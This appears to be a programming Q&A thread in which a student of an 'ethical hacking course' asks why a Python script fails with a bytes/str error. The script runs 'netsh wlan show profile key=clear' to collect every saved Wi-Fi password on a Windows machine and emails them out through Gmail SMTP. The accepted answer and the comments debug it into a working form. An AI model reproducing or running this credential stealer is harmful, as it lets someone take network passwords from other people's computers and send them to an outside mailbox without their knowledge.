# Error when using findall in the re library

Tags: python, python-re

I'm watching an ethical hacking course and when i got to this lecture i got errors I don't know why
I tried but I got an error here it is:

```
    File "D:\send_emails.py", line 14, in <module>
    network_names_list = re.findall('(?:Profile\s*:\s)(.*)', networks)
    File "C:\Users\maha_\AppData\Local\Programs\Python\Python38\lib\re.py", line 241, in findall
    return _compile(pattern, flags).findall(string)
    TypeError: cannot use a string pattern on a bytes-like object
```

and this is my code:

```
import subprocess, smtplib, re


def send_mail(email, password, message):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()


command = "netsh wlan show profile"
networks = subprocess.check_output(command, shell=True)
network_names_list = re.findall('(?:Profile\s*:\s)(.*)', networks)
result = ""
for networks_names in network_names_list:
    command = 'netsh wlan show profile ' + '"' + networks_names + '" ' +" key=clear"
    passwords = subprocess.check_output(command, shell=True)
    result = result + passwords
send_mail("mygmail", "mypassword", result)
```

Comment: try, ``re.findall('(?:Profile\s*:\s)(.*)', networks.decode())``

Answer (score 1, accepted):

`subprocess.check_output(command, shell=True)` returns a bytes object

to convert it to a string use `subprocess.check_output(command, shell=True).decode()`

You will also get an error at  `result = result + passwords` as you cannot concatenate a string to a byte. Instead, use .decode() on `passwords` before concatenating.

so your final code should be

```
import subprocess, smtplib, re


def send_mail(email, password, message):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()


command = "netsh wlan show profile"
networks = subprocess.check_output(command, shell=True).decode()
network_names_list = re.findall('(?:Profile\s*:\s)(.*)', networks)
result = ""
for networks_names in network_names_list:
    command = "netsh wlan show profile " + networks_names + " key=clear"
    passwords = subprocess.check_output(command, shell=True)
    result = result + passwords.decode()
```

Comment: ty it worked but I want to ask another question when the network name has this character ' the script return with errors is there a way to prevent that

Comment: enclose the network name in quotes and replace the character ' in the name with \'